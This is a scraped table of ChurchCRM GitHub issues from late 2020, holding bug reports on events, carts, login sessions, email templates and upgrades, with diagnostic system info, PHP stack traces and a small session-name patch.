SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Create event date range bug | https://api.github.com/repos/ChurchCRM/CRM/issues/5592/comments | 2 | 2020-11-29T13:52:28Z | 2023-12-20T01:50:11Z | https://github.com/ChurchCRM/CRM/issues/5592 | 752,922,264 | 5,592 |
[
"ChurchCRM",
"CRM"
] | When emptying cart to group, the first target group for member is selected from the drop down but you cannot select target role for member, you need to change the default target group then reselect the first taget group again in order to reload the target role for members from the dropdown list.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/v2/people?familyActiveStatus=all
Screen Size |864x1536
Window Size |722x1536
Page Size |1376x1536
Platform Information | Linux graham.wznoc.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
PHP Version | 7.3.24
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Empty Cart To Group | https://api.github.com/repos/ChurchCRM/CRM/issues/5591/comments | 2 | 2020-11-29T13:48:33Z | 2023-12-20T01:50:13Z | https://github.com/ChurchCRM/CRM/issues/5591 | 752,921,393 | 5,591 |
[
"ChurchCRM",
"CRM"
] | Go to Events > Events Attendance Report.
Click the Church Service.
This will display only 1 event even if there are multiple events, and clicking the members list only shows 1 member all the time.
Collected Value Title | Data
----------------------|----------------
Page Name |/churchcrm/EventAttendance.php?Action=List&Event=1&Type=Church%20Service
Screen Size |864x1536
Window Size |722x1536
Page Size |722x1536
Platform Information | Linux graham.wznoc.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64
PHP Version | 7.3.24
SQL Version | 5.5.5-10.3.27-MariaDB
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| Event Attendance Report Bug | https://api.github.com/repos/ChurchCRM/CRM/issues/5590/comments | 2 | 2020-11-29T13:04:45Z | 2024-01-04T02:06:00Z | https://github.com/ChurchCRM/CRM/issues/5590 | 752,912,573 | 5,590 |
[
"ChurchCRM",
"CRM"
] | #### On what page in the application did you find this issue?
Login page fails due to PHP changes. Session prefix is rejected by underlying PHP interpreter. [Wiki page](https://github.com/ChurchCRM/CRM/wiki/Login-Failure:-all-versions-below-4.1.4) has further details and fix for 4.x code branch. This ticket covers the 3.x code branch.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Any
#### What browser (and version) are you running?
Any
#### What version of PHP is the server running?
Any PHP with [bug #79699](https://bugs.php.net/bug.php?id=79699) fix applied:
- 7.4.11+
- 7.3.23+
- 7.2.34+
#### What version of SQL Server are you running?
Any
#### What version of ChurchCRM are you running?
ChurchCRM 3.5.5
#### Fix
Apply the following patch to `Bootstrapper.php` from 3.5.5
```php
--- src/ChurchCRM/Bootstrapper.php 2019-10-26 08:05:23.000000000 +1100
+++ src/ChurchCRM/Bootstrapper-fix.php 2020-11-25 09:37:48.000000000 +1100
@@ -214,7 +214,7 @@
private static function initSession()
{
// Initialize the session
- $sessionName = 'CRM@'.SystemURLs::getRootPath();
+ $sessionName = 'CRM-'.SystemURLs::getRootPath();
session_cache_limiter('private_no_expire:');
session_name($sessionName);
session_start();
``` | Backport Session fix to 3.5.5 | https://api.github.com/repos/ChurchCRM/CRM/issues/5570/comments | 1 | 2020-11-24T22:45:56Z | 2023-11-04T01:28:58Z | https://github.com/ChurchCRM/CRM/issues/5570 | 750,121,588 | 5,570 |
[
"ChurchCRM",
"CRM"
] | Hello team!
I want to upgrade the software to the latest version, but I do not find the AUTOMATIC OPTION in my menu as previous versions shown. Please Help!
I also uploaded the files from 4.2.3 on my server among the old files (no overwriten files) but the version still remain the old, even after manual update. What should I do to run the ultimate version?
Collected Value Title | Data
----------------------|----------------
Page Name |/membri/Menu.php
Screen Size |1080x1920
Window Size |1077x2133
Page Size |1557x2133
Platform Information | Linux gator4150.hostgator.com 4.14.135-214.ELK.el6.x86_64 #1 SMP Wed Jul 31 01:59:27 CDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 5.6.41-84.1
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |Missing Prerequisites: ["Mod Rewrite or Equivalent"]
Integrity check status |{"status":"success"}
| HOW TO UPGRADE FROM 4.2.0 TO 4.2.3 | https://api.github.com/repos/ChurchCRM/CRM/issues/5568/comments | 2 | 2020-11-24T12:57:51Z | 2023-11-01T17:38:03Z | https://github.com/ChurchCRM/CRM/issues/5568 | 749,684,663 | 5,568 |
[
"ChurchCRM",
"CRM"
] | We have English text hardcoded in the template | Outgoing Emails are not localized | https://api.github.com/repos/ChurchCRM/CRM/issues/5558/comments | 0 | 2020-11-21T19:42:12Z | 2020-11-22T01:03:05Z | https://github.com/ChurchCRM/CRM/issues/5558 | 748,089,485 | 5,558 |
[
"ChurchCRM",
"CRM"
] | 


| Outgoing emails look outdated | https://api.github.com/repos/ChurchCRM/CRM/issues/5557/comments | 0 | 2020-11-21T18:50:02Z | 2020-11-25T00:17:56Z | https://github.com/ChurchCRM/CRM/issues/5557 | 748,077,195 | 5,557 |
[
"ChurchCRM",
"CRM"
] | Has the following
https://churchcrm:8890/external/verify/Token: 5fb95cc195583 Type: verifyFamily ValidUntilDate: '2020-11-28T13:30:25-05:00' ReferenceId: 2 RemainingUses: 5
Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |2160x3840
Window Size |1938x1920
Page Size |1938x1920
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Family Verify Email Does not work | https://api.github.com/repos/ChurchCRM/CRM/issues/5556/comments | 1 | 2020-11-21T18:32:30Z | 2020-11-21T20:01:52Z | https://github.com/ChurchCRM/CRM/issues/5556 | 748,074,125 | 5,556 |
[
"ChurchCRM",
"CRM"
] |

Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |1050x1680
Window Size |786x1680
Page Size |1158x1680
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Dashboard Links have HTML tags | https://api.github.com/repos/ChurchCRM/CRM/issues/5550/comments | 0 | 2020-11-19T16:18:10Z | 2020-11-19T17:14:53Z | https://github.com/ChurchCRM/CRM/issues/5550 | 746,725,759 | 5,550 |
[
"ChurchCRM",
"CRM"
] | ```
[19-Nov-2020 10:30:29 America/Detroit] PHP Fatal error: Uncaught Exception: Database error or invalid data, change sLogLevel to debug to see more. in /home/krystoco/demo.churchcrm.io/master/Include/Functions.php:192
Stack trace:
#0 /home/krystoco/demo.churchcrm.io/master/CanvassEditor.php(114): RunQuery('SELECT * FROM c...')
#1 {main}
thrown in /home/krystoco/demo.churchcrm.io/master/Include/Functions.php on line 192
```
Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |1050x1680
Window Size |843x1680
Page Size |1158x1680
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | CanvassEditor Error | https://api.github.com/repos/ChurchCRM/CRM/issues/5549/comments | 0 | 2020-11-19T15:48:14Z | 2020-11-19T17:15:13Z | https://github.com/ChurchCRM/CRM/issues/5549 | 746,700,515 | 5,549 |
[
"ChurchCRM",
"CRM"
] | ```
[18-Nov-2020 18:44:11 America/Detroit] Slim Application Error:
Type: Error
Message: Call to a member function getPropertyType() on null
File: /home/krystoco/demo.churchcrm.io/master/ChurchCRM/Slim/Middleware/Request/PropertyAPIMiddleware.php
Line: 30
Trace: #0 [internal function]: ChurchCRM\Slim\Middleware\Request\PropertyAPIMiddleware->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#1 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/DeferredCallable.php(57): call_user_func_array(Object(ChurchCRM\Slim\Middleware\Request\PropertyAPIMiddleware), Array)
#2 [internal function]: Slim\DeferredCallable->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#3 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(70): call_user_func(Object(Slim\DeferredCallable), Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#4 /home/krystoco/demo.churchcrm.io/master/ChurchCRM/Slim/Middleware/Request/Auth/BaseAuthRoleMiddleware.php(28): Slim\Route->Slim\{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response))
#5 [internal function]: ChurchCRM\Slim\Middleware\Request\Auth\BaseAuthRoleMiddleware->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#6 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/DeferredCallable.php(57): call_user_func_array(Object(ChurchCRM\Slim\Middleware\Request\Auth\MenuOptionsRoleAuthMiddleware), Array)
#7 [internal function]: Slim\DeferredCallable->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#8 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(70): call_user_func(Object(Slim\DeferredCallable), Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#9 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(117): Slim\Route->Slim\{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response))
#10 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/Route.php(268): Slim\Route->callMiddlewareStack(Object(Slim\Http\Request), Object(Slim\Http\Response))
#11 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/App.php(503): Slim\Route->run(Object(Slim\Http\Request), Object(Slim\Http\Response))
#12 /home/krystoco/demo.churchcrm.io/master/ChurchCRM/Slim/Middleware/VersionMiddleware.php(13): Slim\App->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response))
#13 [internal function]: ChurchCRM\Slim\Middleware\VersionMiddleware->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Slim\App))
#14 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/DeferredCallable.php(57): call_user_func_array(Object(ChurchCRM\Slim\Middleware\VersionMiddleware), Array)
#15 [internal function]: Slim\DeferredCallable->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Slim\App))
#16 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(70): call_user_func(Object(Slim\DeferredCallable), Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Slim\App))
#17 /home/krystoco/demo.churchcrm.io/master/ChurchCRM/Slim/Middleware/AuthMiddleware.php(38): Slim\App->Slim\{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response))
#18 [internal function]: ChurchCRM\Slim\Middleware\AuthMiddleware->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#19 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/DeferredCallable.php(57): call_user_func_array(Object(ChurchCRM\Slim\Middleware\AuthMiddleware), Array)
#20 [internal function]: Slim\DeferredCallable->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#21 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(70): call_user_func(Object(Slim\DeferredCallable), Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure))
#22 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(117): Slim\App->Slim\{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response))
#23 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/App.php(392): Slim\App->callMiddlewareStack(Object(Slim\Http\Request), Object(Slim\Http\Response))
#24 /home/krystoco/demo.churchcrm.io/master/vendor/slim/slim/Slim/App.php(297): Slim\App->process(Object(Slim\Http\Request), Object(Slim\Http\Response))
#25 /home/krystoco/demo.churchcrm.io/master/api/index.php(79): Slim\App->run()
#26 {main}
View in rendered output by enabling the "displayErrorDetails" setting.
```
Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |1050x1680
Window Size |843x1680
Page Size |1158x1680
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic
| NPE: PropertyAPIMiddleware | https://api.github.com/repos/ChurchCRM/CRM/issues/5547/comments | 0 | 2020-11-19T15:43:38Z | 2020-11-19T17:13:38Z | https://github.com/ChurchCRM/CRM/issues/5547 | 746,696,754 | 5,547 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
Login screen
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Shared Linux
#### What browser (and version) are you running?
Firefox: 82.0.3 (64-bit)
#### What version of PHP is the server running?
7.4
#### What version of SQL Server are you running?
10.0.38-MariaDB - MariaDB Server
#### What version of ChurchCRM are you running?
4.1.1
This is the first time this has happened. I try to log in and I'm brought directly back to the login screen without any message. The auth log looks like this for my login attempt (a few things redacted - let me know if I've redacted too much):
`[2020-11-16 20:30:08] authLogger.DEBUG: Error determining session authentication status.Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(120): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(270): ChurchCRM\Authentication\AuthenticationManager::ValidateUserSessionIsActive(false) #2 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(73): ChurchCRM\Bootstrapper::configureUserEnvironment() #3 /home/ejadmin/sites/churchcrm/Include/LoadConfigs.php(22): ChurchCRM\Bootstrapper::init('localhost', NULL, '************...', '**************...', '************...', '', true, Array) #4 /home/ejadmin/sites/churchcrm/Include/Config.php(71): require_once('/home/ejadmin/s...') #5 /home/ejadmin/sites/churchcrm/session/index.php(2): require('/home/ejadmin/s...') #6 {main} [] {"url":"/session/begin","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"ValidateUserSessionIsActive"}}
[2020-11-16 20:30:08] authLogger.DEBUG: Processing local login for***** [] {"url":"/session/begin","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationProviders\\LocalAuthentication","ContextMethod":"Authenticate"}}
[2020-11-16 20:30:08] authLogger.INFO: User succefully logged in without 2FA: ***** [] {"url":"/session/begin","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationProviders\\LocalAuthentication","ContextMethod":"Authenticate"}}
[2020-11-16 20:30:08] authLogger.DEBUG: Authentication Successful; redirecting to: Menu.php [] {"url":"/session/begin","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"Authenticate"}}
[2020-11-16 20:30:08] authLogger.DEBUG: Error determining session authentication status.Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(120): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(270): ChurchCRM\Authentication\AuthenticationManager::ValidateUserSessionIsActive(false) #2 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(73): ChurchCRM\Bootstrapper::configureUserEnvironment() #3 /home/ejadmin/sites/churchcrm/Include/LoadConfigs.php(22): ChurchCRM\Bootstrapper::init('localhost', NULL, '************...', '**************...', '************...', '', true, Array) #4 /home/ejadmin/sites/churchcrm/Include/Config.php(71): require_once('/home/ejadmin/s...') #5 /home/ejadmin/sites/churchcrm/Menu.php(18): require('/home/ejadmin/s...') #6 {main} [] {"url":"/Menu.php","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"ValidateUserSessionIsActive"}}
[2020-11-16 20:30:08] authLogger.DEBUG: Error determining session authentication status. Redirecting to login page. Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(135): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/Include/Functions.php(31): ChurchCRM\Authentication\AuthenticationManager::EnsureAuthentication() #2 /home/ejadmin/sites/churchcrm/Menu.php(19): require('/home/ejadmin/s...') #3 {main} [] {"url":"/Menu.php","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"EnsureAuthentication"}}
[2020-11-16 20:30:08] authLogger.DEBUG: Error determining session authentication status.Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(120): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(270): ChurchCRM\Authentication\AuthenticationManager::ValidateUserSessionIsActive(false) #2 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(73): ChurchCRM\Bootstrapper::configureUserEnvironment() #3 /home/ejadmin/sites/churchcrm/Include/LoadConfigs.php(22): ChurchCRM\Bootstrapper::init('localhost', NULL, '************...', '**************...', '************...', '', true, Array) #4 /home/ejadmin/sites/churchcrm/Include/Config.php(71): require_once('/home/ejadmin/s...') #5 /home/ejadmin/sites/churchcrm/session/index.php(2): require('/home/ejadmin/s...') #6 {main} [] {"url":"/session/begin","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"ValidateUserSessionIsActive"}}
[2020-11-16 20:30:09] authLogger.DEBUG: Error determining session authentication status.Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(120): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(270): ChurchCRM\Authentication\AuthenticationManager::ValidateUserSessionIsActive(false) #2 /home/ejadmin/sites/churchcrm/ChurchCRM/Bootstrapper.php(73): ChurchCRM\Bootstrapper::configureUserEnvironment() #3 /home/ejadmin/sites/churchcrm/Include/LoadConfigs.php(22): ChurchCRM\Bootstrapper::init('localhost', NULL, '************...', '**************...', '************...', '', true, Array) #4 /home/ejadmin/sites/churchcrm/Include/Config.php(71): require_once('/home/ejadmin/s...') #5 /home/ejadmin/sites/churchcrm/api/index.php(2): require('/home/ejadmin/s...') #6 {main} [] {"url":"/api/system/background/csp-report","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"ValidateUserSessionIsActive"}}
[2020-11-16 20:30:09] authLogger.DEBUG: Error determining session authentication status.Exception: No active authentication provider in /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php:27 Stack trace: #0 /home/ejadmin/sites/churchcrm/ChurchCRM/Authentication/AuthenticationManager.php(120): ChurchCRM\Authentication\AuthenticationManager::GetAuthenticationProvider() #1 /home/ejadmin/sites/churchcrm/ChurchCRM/Slim/Middleware/AuthMiddleware.php(30): ChurchCRM\Authentication\AuthenticationManager::ValidateUserSessionIsActive(true) #2 [internal function]: ChurchCRM\Slim\Middleware\AuthMiddleware->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure)) #3 /home/ejadmin/sites/churchcrm/vendor/slim/slim/Slim/DeferredCallable.php(43): call_user_func_array(Object(ChurchCRM\Slim\Middleware\AuthMiddleware), Array) #4 [internal function]: Slim\DeferredCallable->__invoke(Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure)) #5 /home/ejadmin/sites/churchcrm/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(70): call_user_func(Object(Slim\DeferredCallable), Object(Slim\Http\Request), Object(Slim\Http\Response), Object(Closure)) #6 /home/ejadmin/sites/churchcrm/vendor/slim/slim/Slim/MiddlewareAwareTrait.php(117): Slim\App->Slim\{closure}(Object(Slim\Http\Request), Object(Slim\Http\Response)) #7 /home/ejadmin/sites/churchcrm/vendor/slim/slim/Slim/App.php(388): Slim\App->callMiddlewareStack(Object(Slim\Http\Request), Object(Slim\Http\Response)) #8 /home/ejadmin/sites/churchcrm/vendor/slim/slim/Slim/App.php(296): Slim\App->process(Object(Slim\Http\Request), Object(Slim\Http\Response)) #9 /home/ejadmin/sites/churchcrm/api/index.php(77): Slim\App->run() #10 {main} [] {"url":"/api/system/background/csp-report","remote_ip":"**********","correlation_id":"***********","context":{"ContextClass":"ChurchCRM\\Authentication\\AuthenticationManager","ContextMethod":"ValidateUserSessionIsActive"}}`
So it looks like I'm getting in but then it kicks me out. I have not logged on in awhile so I'm not sure what has happened in the meantime (perhaps a PHP update?).
Thanks for any help you can give!
| Can't log in: "Error determining session authentication status.Exception: No active authentication provider..." | https://api.github.com/repos/ChurchCRM/CRM/issues/5545/comments | 2 | 2020-11-16T20:07:11Z | 2023-11-01T17:38:03Z | https://github.com/ChurchCRM/CRM/issues/5545 | 744,145,333 | 5,545 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5544/comments | 0 | 2020-11-16T17:51:03Z | 2020-11-16T17:51:10Z | https://github.com/ChurchCRM/CRM/issues/5544 | 744,038,991 | 5,544 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5543/comments | 0 | 2020-11-16T17:48:58Z | 2020-11-16T17:50:01Z | https://github.com/ChurchCRM/CRM/issues/5543 | 744,037,668 | 5,543 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5542/comments | 0 | 2020-11-16T17:47:18Z | 2020-11-16T17:50:34Z | https://github.com/ChurchCRM/CRM/issues/5542 | 744,036,647 | 5,542 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5541/comments | 0 | 2020-11-16T17:44:06Z | 2020-11-16T17:50:32Z | https://github.com/ChurchCRM/CRM/issues/5541 | 744,034,570 | 5,541 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5540/comments | 0 | 2020-11-16T17:43:56Z | 2020-11-16T17:50:31Z | https://github.com/ChurchCRM/CRM/issues/5540 | 744,034,467 | 5,540 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5539/comments | 0 | 2020-11-16T17:38:27Z | 2020-11-16T17:50:30Z | https://github.com/ChurchCRM/CRM/issues/5539 | 744,030,941 | 5,539 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5538/comments | 0 | 2020-11-16T17:38:14Z | 2020-11-16T17:50:28Z | https://github.com/ChurchCRM/CRM/issues/5538 | 744,030,792 | 5,538 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5537/comments | 0 | 2020-11-16T17:38:08Z | 2020-11-16T17:50:26Z | https://github.com/ChurchCRM/CRM/issues/5537 | 744,030,716 | 5,537 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5536/comments | 0 | 2020-11-16T17:35:42Z | 2020-11-16T17:50:25Z | https://github.com/ChurchCRM/CRM/issues/5536 | 744,029,190 | 5,536 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5535/comments | 0 | 2020-11-16T17:32:25Z | 2020-11-16T17:50:24Z | https://github.com/ChurchCRM/CRM/issues/5535 | 744,027,090 | 5,535 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5534/comments | 0 | 2020-11-16T17:29:59Z | 2020-11-16T17:50:22Z | https://github.com/ChurchCRM/CRM/issues/5534 | 744,025,351 | 5,534 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5533/comments | 0 | 2020-11-16T17:28:29Z | 2020-11-16T17:28:39Z | https://github.com/ChurchCRM/CRM/issues/5533 | 744,024,361 | 5,533 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5532/comments | 0 | 2020-11-16T17:25:40Z | 2020-11-16T17:27:35Z | https://github.com/ChurchCRM/CRM/issues/5532 | 744,022,156 | 5,532 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5531/comments | 0 | 2020-11-16T17:23:54Z | 2020-11-16T17:25:42Z | https://github.com/ChurchCRM/CRM/issues/5531 | 744,020,945 | 5,531 |
[
"ChurchCRM",
"CRM"
